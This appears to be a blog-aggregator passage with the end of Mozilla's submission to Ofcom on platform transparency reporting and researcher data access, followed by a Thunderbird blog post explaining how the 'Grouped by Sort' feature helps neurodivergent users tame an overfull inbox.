We also recommend that data about content engagement and account growth should be considered ‘core’ information that needs to be collected and reported on a regular basis. This data is essential for monitoring civic discourse and election integrity.

Engaging a Broader Range of Stakeholders

Mozilla also believes that a broad range of stakeholders should be involved in shaping and reviewing transparency reporting. Ofcom’s consultative approach with service providers is commendable.  We encourage further expansion of this engagement to include stakeholders such as researchers, civil society organizations, and end-users.

Based on our extensive research, we recommend “transparency delegates.” Transparency delegates are experts who can act as intermediaries between platforms and the public, by using their expertise to evaluate platforms’ transparency in a particular area (for example, AI) and to convey relevant information to a wider audience. This could help ensure that transparency reports are accessible and useful to a range of audiences, from policymakers to everyday users who may not have the technical expertise to interpret complex data.

Enhancing Data Access for Researchers

Transparency reports alone are not enough to ensure accountability. Mozilla emphasizes the importance of giving independent researchers access to platform data. In our view, data access is not just a tool for academic inquiry but a key component of public accountability. Ofcom should explore mechanisms for providing researchers with access to data in a way that protects user privacy while allowing for independent scrutiny of platform practices.

This access is crucial for understanding how content moderation practices affect civic discourse, public safety, and individual rights online. Without it, we risk relying too heavily on self-reported data, which can be inconsistent or incomplete.  Multiple layers of transparency are needed, in order to build trust in the quality of platform transparency disclosures.

Aligning with Other Regulatory Frameworks

Finally, we encourage Ofcom to align its transparency requirements with those set out in other major regulatory frameworks, particularly the EU’s Digital Services Act (DSA). Harmonization will help reduce the compliance burden on platforms and allow users and researchers to compare transparency reports more easily across jurisdictions.

Mozilla looks forward to continuing our work with Ofcom and other stakeholders to create a more transparent and accountable online ecosystem.

 

The post Mozilla Participates to Ofcom’s Draft Transparency Reporting Guidance appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdMaximize Your Day: Focus Your Inbox with ‘Grouped by Sort’

For me, staying on top of my inbox has always seemed like an unattainable goal. I’m not an organized person by nature. Periodic and severe email anxiety (thanks, grad school!) often meant my inbox was in the quadruple digits (!).

Lately, something’s shifted. Maybe it’s working here, where people care a lot about making email work for you. These past few months, my inbox has stayed if not manageable, then pretty close to it. I’ve only been here a year, which has made this an easier goal to reach. Treating my email like laundry is definitely helping!

But how do you get a handle on your inbox when it feels out of control? R.L. Dane, one of our fans on Mastodon, reminded us Thunderbird has a powerful, built-in tool than can help: the ‘Grouped by Sort’ feature!

Email Management for All Brains

For those of us who are neurodiverse, email management can be a challenge. Each message that arrives in your inbox, even without a notification ding or popup, is a potential distraction. An email can contain a new task for your already busy to-do list. Or one email can lead you down a rabbit hole while other emails pile up around it. Eventually, those emails we haven’t archived, replied to, or otherwise processed take on a life of their own.

Staring at an overgrown inbox isn’t fun for anyone. It’s especially overwhelming for those of us who struggle with executive function – the skills that help us focus, plan, and organize. A full or overfull inbox doesn’t seem like a hurdle we can overcome. We feel frozen, unsure where to even begin tackling it, and while we’re stuck trying to figure out what to do, new emails keep coming. Avoiding our inboxes entirely starts to seem like the only option – even if this is the most counterproductive thing we can do.

So, how in the world do people like us dig out of our inboxes?

Feature for Focus: Grouped by Sort

We love seeing R.L. Dane’s regular Thunderbird tips, tricks, and hacks for productivity. In fact, he was the one who brought this feature to our attention on a Mastodon post! We were thrilled when we asked if we could turn it to a productivity post and got an excited “Yes!” in response.

As he pointed out, using Grouped by Sort, you can focus on more recently received emails. Sorting by Date, this feature will group your emails into the following collapsible categories:

  • Today
  • Yesterday
  • Last 7 Days
  • Last 14 Days
  • Older

Turning on Grouped by Sort is easy. Click the message list display options, then click ‘Sort by.’ (In the top third, toggle the ‘Date’ option. In the second third, select your preferred order of Descending or Ascending. Finally, in the bottom third, toggle ‘Grouped by Sort.’

Now you’re ready to whittle your way through an overflowing inbox, one group at a time.

And once you get down to a mostly empty and very manageable inbox, you’ll want to find strategies and habits to keep it there. Treating your email like laundry is a great place to start. We’d love to hear your favorite email management habits in the comments!

Resources

ADDitude Magazine: https://www.additudemag.com/addressing-e-mail/

Dixon Life Coaching: https://www.dixonlifecoaching.com/post/why-high-achievers-with-adhd-love-and-hate-their-email-inbox

The post Maximize Your Day: Focus Your Inbox with ‘Grouped by Sort’ appeared first on The Thunderbird Blog.